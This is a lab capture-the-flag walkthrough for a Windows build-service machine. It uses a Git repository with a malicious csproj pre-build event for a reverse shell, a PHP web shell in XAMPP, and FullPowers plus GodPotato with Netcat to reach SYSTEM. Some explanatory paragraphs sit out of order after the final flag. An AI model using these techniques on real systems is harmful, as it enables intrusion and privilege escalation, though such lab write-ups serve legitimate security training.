szczygielka@hacks$ nmap -sCV -p- 10.129.210.129
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-26 14:48 EST
Nmap scan report for 10.129.210.129
Host is up (0.038s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.56 ((Win64) OpenSSL/1.1.1t PHP/8.1.17)
|_http-title: Visual - Revolutionizing Visual Studio Builds
|_http-server-header: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.1.17
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 168.08 seconds
The Nmap output shows a single open port, 80, running Apache 2.4.56 for Win64 with PHP 8.1.17, so the target is a Windows host serving PHP. Everything else is filtered.
Exploring website
Let's visit the website located at http://10.129.210.129/ using a web browser.
The website offers to compile C# projects targeting .NET 6.0. According to the description, we submit a link to a Git repository, the remote machine clones and builds the project, and the resulting executable or DLL files are returned to us.
Let's first verify that the target really fetches the supplied URL. Run a Python HTTP server on our attacking machine to act as a fake repository:
szczygielka@hacks$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Let's provide a link to our fake repository and click Submit button:
After pressing the button, we are redirected to the following page:
The Python HTTP server log shows that the target machine connected back to us and requested repository files, which of course failed because our web root is empty:
Based on this test we know that the machine really reaches out to the supplied URL and tries to clone it as a Git repository. Next, let's check whether the build step also works. For that we need a real Git repository containing a Visual Studio C# project; a sample .NET 6.0 project can be found in this repository:
We can clone the repository by the following command:
Go to the .git directory of the solution we just cloned:
szczygielka@hacks$ cd sample-dotnet6/.git
In this directory, run the following command so that the repository can be served by a plain (dumb) HTTP server:
szczygielka@hacks$ git --bare update-server-info
Start the Python HTTP server in this directory as well (the .git directory itself is the web root, so the repository URL is just our IP):
szczygielka@hacks$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
In another terminal window, check that cloning over plain HTTP works against our own server:
szczygielka@hacks$ git clone http://10.10.14.73
Cloning into '10.10.14.73'...
Cloning works. We can now submit the link to our repository on the website and let the target build the project. After providing the link, the Python HTTP server log shows the files being fetched from our server:
The user.txt flag can be found in C:\Users\enox\Desktop.
Privilege escalation
Shell as LocalService
In the C:\ directory we find xampp:
PS C:\> dir
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/5/2022 12:03 PM PerfLogs
d-r--- 6/10/2023 11:00 AM Program Files
d----- 6/10/2023 10:51 AM Program Files (x86)
d-r--- 6/10/2023 10:59 AM Users
d----- 9/19/2023 6:44 AM Windows
d----- 6/10/2023 10:32 AM xampp
XAMPP is an Apache distribution bundling MariaDB, PHP, and Perl. Its web root is C:\xampp\htdocs\, and any PHP file placed there is executed by the web server, so write access to this directory means code execution as the web server's account. Let's change into this directory and drop a simple web shell to find out which account the web server is running as:
szczygielka@hacks$ nc -lnvp 8080
listening on [any] 8080 ...
connect to [10.10.14.73] from (UNKNOWN) [10.129.212.12] 49697
SOCKET: Shell has connected! PID: 2428
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\xampp\htdocs>
As expected, the web server runs as the local service account:
C:\xampp\htdocs>whoami
nt authority\local service
Let's check which privileges this account currently holds:
C:\xampp\htdocs>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Let's download the FullPowers.exe executable from the project's release page to our attacking machine and serve it with the Python HTTP server:
szczygielka@hacks$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Then, on the target machine, open a PowerShell console, download the file from our server into C:\xampp\htdocs, and run it:
PS C:\xampp\htdocs> .\FullPowers.exe
[+] Started dummy thread with id 3056
[+] Successfully created scheduled task.
[+] Got new token! Privilege count: 7
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4851]
(c) 2018 Microsoft Corporation. All rights reserved.
Enumerate our privileges again in the new shell:
C:\Windows\system32>whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeAuditPrivilege Generate security audits Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
We recovered the default privilege set. FullPowers achieves this by registering a scheduled task that runs as the same service account; the task's process receives the account's full default token (hence the "Successfully created scheduled task" message above). Among the recovered privileges is SeImpersonatePrivilege, which the Potato family of exploits abuses to obtain a token for NT AUTHORITY\SYSTEM. To escalate and get a reverse shell as SYSTEM we use the GodPotato tool:
Let's download the GodPotato-NET4.exe file from the Release section to the attacking machine and rename it to something shorter:
Let's also download Netcat for Windows (nc.exe) to the attacking machine; we will transfer it to the target, because GodPotato needs a command to execute as SYSTEM and nc.exe will carry the reverse shell back to us. Then start the listener:
szczygielka@hacks$ nc -lnvp 9000
listening on [any] 9000 ...
connect to [10.10.14.73] from (UNKNOWN) [10.129.212.12] 49766
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
GodPotato runs our Netcat command as SYSTEM and the shell arrives at the listener; whoami confirms that we are NT AUTHORITY\SYSTEM:
PS C:\xampp\htdocs> whoami
nt authority\system
Root flag
The root flag can be obtained at C:\Users\Administrator\Desktop.
PS C:\Users\Administrator\Desktop> dir
dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 2/28/2024 10:30 AM 34 root.txt
According to the Git documentation, this command updates auxiliary info files to help dumb servers. An answer on Stack Overflow explains that a dumb server is any plain web server that exposes a Git repository as static files over HTTP (exactly what python3 -m http.server is), and every repository hosted this way needs this command run in it; it has to be re-run after every commit, otherwise clients see stale refs.
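As an added example (not part of the original writeup), the following Python script shows what the dumb-HTTP test above actually exercises: which files git's dumb transport needs (the ones git update-server-info writes), a fetch of info/refs like the one the target performed against our empty http.server, and a static server that records every requested path so we can confirm a remote host really tried to clone. The repository layout and the SHA are constructed stand-ins; no real Git objects are involved.

```python
import os
import tempfile
import threading
import urllib.request
from http.server import SimpleHTTPRequestHandler, ThreadingHTTPServer

# Files a Git client needs to clone over "dumb" HTTP, where the repository is
# just static files behind a plain web server (python3 -m http.server here).
# git update-server-info (re)writes the last two; HEAD exists in any repo.
REQUIRED = ("HEAD", "info/refs", "objects/info/packs")


def dumb_http_missing(git_dir):
    """Return the required files that are absent from git_dir (empty = ready)."""
    return [p for p in REQUIRED if not os.path.isfile(os.path.join(git_dir, p))]


def parse_info_refs(text):
    """Parse info/refs (one '<sha>\\t<refname>' per line) into {refname: sha}."""
    refs = {}
    for line in text.splitlines():
        sha, _, name = line.strip().partition("\t")
        if sha and name:
            refs[name] = sha
    return refs


def serve_dir(directory):
    """Serve `directory` on an ephemeral localhost port and record every path
    a client requests, so we can see what the remote cloner asked for."""
    requested = []

    class Handler(SimpleHTTPRequestHandler):
        def __init__(self, *args, **kwargs):
            super().__init__(*args, directory=directory, **kwargs)

        def log_message(self, fmt, *args):  # silence the default access log
            pass

        def do_GET(self):
            requested.append(self.path)
            super().do_GET()

    srv = ThreadingHTTPServer(("127.0.0.1", 0), Handler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://127.0.0.1:%d" % srv.server_address[1], requested


def fetch_refs(base_url):
    """Request <base_url>/info/refs, the first file git's dumb-HTTP transport
    fetches; a 404 here is the failed download seen in the empty-server test."""
    with urllib.request.urlopen(base_url.rstrip("/") + "/info/refs", timeout=5) as r:
        return parse_info_refs(r.read().decode())


def make_fake_repo(root):
    """Constructed stand-in for a .git directory after `git update-server-info`.
    The SHA is made up and there are no real objects; only the layout matters."""
    os.makedirs(os.path.join(root, "info"))
    os.makedirs(os.path.join(root, "objects", "info"))
    with open(os.path.join(root, "HEAD"), "w") as f:
        f.write("ref: refs/heads/main\n")
    with open(os.path.join(root, "info", "refs"), "w") as f:
        f.write("1111111111111111111111111111111111111111\trefs/heads/main\n")
    open(os.path.join(root, "objects", "info", "packs"), "w").close()


def demo():
    root = tempfile.mkdtemp()
    missing_before = dumb_http_missing(root)   # empty dir: everything missing
    make_fake_repo(root)
    missing_after = dumb_http_missing(root)    # []
    srv, url, requested = serve_dir(root)
    try:
        refs = fetch_refs(url)
    finally:
        srv.shutdown()
        srv.server_close()
    return missing_before, missing_after, refs, list(requested)


if __name__ == "__main__":
    print(demo())
```

Against a real repository, run dumb_http_missing on the .git directory before and after git update-server-info to see why the first clone attempt from the target could not succeed, and use serve_dir in place of python3 -m http.server when you want a programmatic record of which paths the target requested.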
Maybe a successful project build won't even be necessary. Let's see whether the Visual Studio compilation process itself can be turned into remote code execution. A thread on Stack Overflow describes possible attack vectors for Visual Studio projects, one of them being pre-build events. This vector does not require the project to build correctly, because the malicious command runs before compilation starts. For Visual Studio projects, the pre-build event is stored in the project file itself.
From the Microsoft documentation we learn that when a solution is built in Visual Studio, MSBuild is used to build each project in it. Every Visual Studio project includes an MSBuild project file, an XML document containing everything MSBuild needs to build the project: the content to include, platform requirements, versioning information, and also build events. The extension of the project file depends on the project type; for a C# project it is .csproj, and in our case the file is Sample.DotNet6.Api.csproj. The documentation on build events contains examples of how to add a pre-build event to the project file. We can do this by adding the following lines to the Sample.DotNet6.Api.csproj file:
Let's search for a payload that gives us a reverse shell. In this case we use the PowerShell #3 (Base64) payload, which can be generated with a reverse shell payload generator. Let's add the payload to the Sample.DotNet6.Api.csproj file:
So we can get a reverse shell as the local service account. We will use Ivan Sincek's PHP reverse shell from his GitHub repository. Prepare the revshell.php file on our attacking machine and serve it with the Python HTTP server; first, start the listener on the chosen port:
According to Microsoft's documentation, the privileges currently held by the local service account are not its defaults (LOCAL SERVICE normally holds SeImpersonatePrivilege, among others). To try to restore the default privilege set of this account, we can use the FullPowers tool: